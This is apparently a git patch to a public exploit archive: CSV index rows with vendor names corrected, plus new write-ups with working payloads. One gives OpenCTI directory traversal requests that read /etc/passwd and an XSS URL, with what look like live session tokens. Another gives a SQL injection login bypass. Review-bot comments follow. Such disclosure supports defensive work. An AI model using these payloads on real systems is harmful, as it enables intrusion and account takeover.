 39414,exploits/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",webapps,php,80
 39415,exploits/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",webapps,php,80
@@ -39402,8 +39403,8 @@ id,file,description,date,author,type,platform,port
 40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",webapps,hardware,
 40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php,
 40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware,
-40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi,
-40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware,
+40889,exploits/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi,
+40898,exploits/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware,
 40901,exploits/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",webapps,hardware,
 40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php,
 40908,exploits/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,webapps,php,80
@@ -39578,7 +39579,7 @@ id,file,description,date,author,type,platform,port
 41198,exploits/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php,
 41199,exploits/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php,
 41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php,
-41205,exploits/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware,
+41205,exploits/hardware/webapps/41205.py,"Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware,
 41201,exploits/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php,
 41202,exploits/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php,
 41203,exploits/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php,
@@ -39714,7 +39715,7 @@ id,file,description,date,author,type,platform,port
 41391,exploits/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php,
 41392,exploits/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",webapps,php,
 41393,exploits/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php,
-41394,exploits/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware,
+41394,exploits/hardware/webapps/41394.py,"Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware,
 41395,exploits/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,webapps,windows,
 41396,exploits/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,webapps,php,
 41399,exploits/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",webapps,php,
@@ -39760,7 +39761,7 @@ id,file,description,date,author,type,platform,port
 41453,exploits/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,multiple,
 41455,exploits/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,webapps,php,
 41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
-41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware,
+41459,exploits/hardware/webapps/41459.py,"Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware,
 41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
 41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
 41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
@@ -39769,7 +39770,7 @@ id,file,description,date,author,type,platform,port
 41465,exploits/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
 41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java,
 41470,exploits/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",webapps,php,
-41472,exploits/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware,
+41472,exploits/hardware/webapps/41472.html,"Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware,
 41478,exploits/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",webapps,hardware,
 41492,exploits/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php,
 41482,exploits/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",webapps,xml,
@@ -39822,7 +39823,7 @@ id,file,description,date,author,type,platform,port
 41535,exploits/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,
 41536,exploits/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,
 41539,exploits/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,
-41540,exploits/php/webapps/41540.py,"Multiple WordPress Plugins - Arbitrary File Upload",2017-03-03,"The Martian",webapps,php,
+41540,exploits/php/webapps/41540.py,"Multiple WordPress Plugins - Arbitrary File Upload",2017-03-03,"The Martian",webapps,php,
 41541,exploits/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",webapps,json,
 41543,exploits/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php,
 41544,exploits/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php,
@@ -40583,7 +40584,7 @@ id,file,description,date,author,type,platform,port
 42950,exploits/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",webapps,php,
 42953,exploits/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)",2017-09-20,xxlegend,webapps,windows,
 42954,exploits/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",webapps,php,
-42956,exploits/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware,
+42956,exploits/hardware/webapps/42956.txt,"Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware,
 42959,exploits/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",webapps,php,
 42961,exploits/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby,
 42966,exploits/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)",2017-10-09,intx0x80,webapps,jsp,
@@ -41523,7 +41524,7 @@ id,file,description,date,author,type,platform,port
 45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
 45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80
 45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80
-45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80
+45741,exploits/hardware/webapps/45741.txt,"Netgear WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80
 45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80
 45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
 45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80
@@ -42116,7 +42117,7 @@ id,file,description,date,author,type,platform,port
 47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java,
 47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,
 47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi,
-47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
+47117,exploits/hardware/webapps/47117.txt,"Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
 47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
 47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80
 47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
@@ -42520,7 +42521,7 @@ id,file,description,date,author,type,platform,port
 48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml,
 48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,
 48029,exploits/multiple/webapps/48029.txt,"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting",2020-02-10,"Prasenjit Kanti Paul",webapps,multiple,
-48030,exploits/php/webapps/48030.txt,"WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php,
+48030,exploits/php/webapps/48030.txt,"WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php,
 48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
 48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
 48047,exploits/php/webapps/48047.rb,"WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
@@ -42704,7 +42705,7 @@ id,file,description,date,author,type,platform,port
 48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,
 48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php,
 48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,
-48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php,
+48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php,
 48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
 48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
 48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,
@@ -42720,7 +42721,7 @@ id,file,description,date,author,type,platform,port
 48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,
 48454,exploits/linux/webapps/48454.py,"Phase Botnet - Blind SQL Injection",2014-12-23,MalwareTech,webapps,linux,
 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,
-48457,exploits/php/webapps/48457.txt,"ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php,
+48457,exploits/php/webapps/48457.txt,"WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php,
 48458,exploits/php/webapps/48458.txt,"CuteNews 2.1.2 - Authenticated Arbitrary File Upload",2020-05-12,"Nhat Ha",webapps,php,
 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
@@ -42733,7 +42734,7 @@ id,file,description,date,author,type,platform,port
 48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php,
 48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java,
 48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware,
-48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php,
+48475,exploits/php/webapps/48475.txt,"WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php,
 48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,
 48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java,
 48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php,
@@ -42755,7 +42756,7 @@ id,file,description,date,author,type,platform,port
 48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
 48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php,
 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,
-48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
+48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,
 48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php,
@@ -42775,7 +42776,7 @@ id,file,description,date,author,type,platform,port
 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php,
 48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php,
 48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple,
-48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php,
+48534,exploits/php/webapps/48534.py,"WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php,
 48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,
 48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php,
 48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php,
@@ -42803,8 +42804,10 @@ id,file,description,date,author,type,platform,port
 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
-48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
+48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,
 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,
 48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple,
+48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware,
+48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,
From 7312a8330de86e9097f803ce5b42df072b01855d Mon Sep 17 00:00:00 2001
From: Offensive Security Date: Thu, 18 Jun 2020 05:01:57 +0000 Subject: [PATCH 16/17] DB: 2020-06-18 3 changes to exploits/shellcodes Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) College-Management-System-Php 1.0 - Authentication Bypass OpenCTI 3.3.1 - Directory Traversal --- exploits/multiple/webapps/48595.txt | 100 ++++++++++++++++++++++++++ exploits/php/webapps/48593.txt | 35 +++++++++ exploits/windows/local/48594.py | 108 ++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 246 insertions(+) create mode 100644 exploits/multiple/webapps/48595.txt create mode 100644 exploits/php/webapps/48593.txt create mode 100755 exploits/windows/local/48594.py diff --git a/exploits/multiple/webapps/48595.txt b/exploits/multiple/webapps/48595.txt new file mode 100644 index 000000000..e0462aaf9 --- /dev/null +++ b/exploits/multiple/webapps/48595.txt 
@@ -0,0 +1,100 @@
+# Exploit Title: OpenCTI 3.3.1 - Directory Traversal
+# Date: 2020-03-05
+# Exploit Author: Raif Berkay Dincel
+# Vendor Homepage: www.opencti.io/
+# Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1]
+# Version: [3.3.1]
+# CVE-ID: N/A
+# Tested on: Linux Mint / Windows 10
+# Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD]
+
+# As a result of the research, two vulnerability were identified. (Directory Traversal & Cross Site Scripting [XSS])
+# Technical information is provided below step by step.
+
+# [1] - Directory Traversal Vulnerability
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/static/css/[Payload]
+
+# Proof of Concepts:
+https://TARGET/static/css//../../../../../../../../etc/passwd
+
+# HTTP Request:
+
+GET /static/css//../../../../../../../../etc/passwd HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c
+Upgrade-Insecure-Requests: 1
+
+# HTTP Response
+
+HTTP/1.1 200 OK
+X-DNS-Prefetch-Control: off
+X-Frame-Options: SAMEORIGIN
+Strict-Transport-Security: max-age=15552000; includeSubDomains
+X-Download-Options: noopen
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+Content-Type: text/css; charset=utf-8
+ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o"
+Vary: Accept-Encoding
+Date: Sun, 03 May 2020 01:25:21 GMT
+Connection: close
+Content-Length: 1280
+
+root:x:0:0:root:/root:/bin/ash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+man:x:13:15:man:/usr/man:/sbin/nologin
+postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
+squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
+xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+postgres:x:70:70::/var/lib/postgresql:/bin/sh
+cyrus:x:85:12::/usr/cyrus:/sbin/nologin
+vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+node:x:1000:1000:Linux User,,,:/home/node:/bin/sh
+
+
+# [2] - Cross Site Scripting (XSS) Vulnerability
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/graphql?[Payload]
+
+# Proof of Concepts:
+TARGET/graphql?'"-->
+
+https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E
+
+# HTTP Request:
+
+GET /graphql?'"--> HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw
+User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
\ No newline at end of file
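Review bot: The captured HTTP requests in both sections still carry what look like real session values: each `Cookie:` header includes a `connect.sid` and an `opencti_token`. These should be replaced with placeholders such as `opencti_token=<redacted>` before the file is published. The header comment describes two issues (directory traversal and cross-site scripting), but the title and the matching `files_exploits.csv` row name only the traversal, so the entry will not surface in a search for the XSS. A short remediation line would make the write-up usable for triage: the fixed release, if one exists, and a note that requests under `/static/` must be normalised and confined to the asset directory.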
diff --git a/exploits/php/webapps/48593.txt b/exploits/php/webapps/48593.txt
new file mode 100644
index 000000000..030e45e0c
--- /dev/null
+++ b/exploits/php/webapps/48593.txt
@@ -0,0 +1,35 @@
+# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection
+# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
+# Website: https://github.com/olotieno/College-Management-System-Php
+# Date: 2020-06-16
+# Google Dork: N/A
+# Vendor: https://github.com/olotieno/
+# Software Link: https://github.com/olotieno/College-Management-System-Php.git
+# Affected Version: N/A
+# Patched Version: unpatched
+# Category: Web Application
+# Tested on: MAC
+
+The College Management System Php suffers from sql injection vulnerabilities in the index.php page:
+
+$msg="";
+if(isset($_POST['btn_log'])){
+ $uname=$_POST['unametxt'];
+ $pwd=$_POST['pwdtxt'];
+
+ $sql=mysqli_query($con,"SELECT * FROM users_tbl
+ WHERE username='$uname' AND password='$pwd'
+
+SQL injection vulnerability:-
+in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
+
+payload:
+' or 1=1 --
+
+
+
+Thank you
+
+regards
+Abu Safian Blay
+https://inveteckglobal.com
\ No newline at end of file
diff --git a/exploits/windows/local/48594.py b/exploits/windows/local/48594.py
new file mode 100755
index 000000000..11992f74c
--- /dev/null
+++ b/exploits/windows/local/48594.py
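Review bot: The quoted `index.php` excerpt in 48593.txt stops in the middle of the `mysqli_query(` call, so a reader cannot see how the login decision is made from the result; the snippet should be quoted through the end of the statement. The metadata is also inconsistent: the title says version 1.0 while `# Affected Version:` says N/A, and the `files_exploits.csv` row added later in this patch drops the "SQL Injection" part of the title. For defenders, one line stating the fix would help: bind `unametxt` and `pwdtxt` through a prepared statement (`mysqli_prepare` / `mysqli_stmt_bind_param`) instead of interpolating them into the query string. The query as quoted also appears to compare the password in plaintext, which is worth stating as a separate finding.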
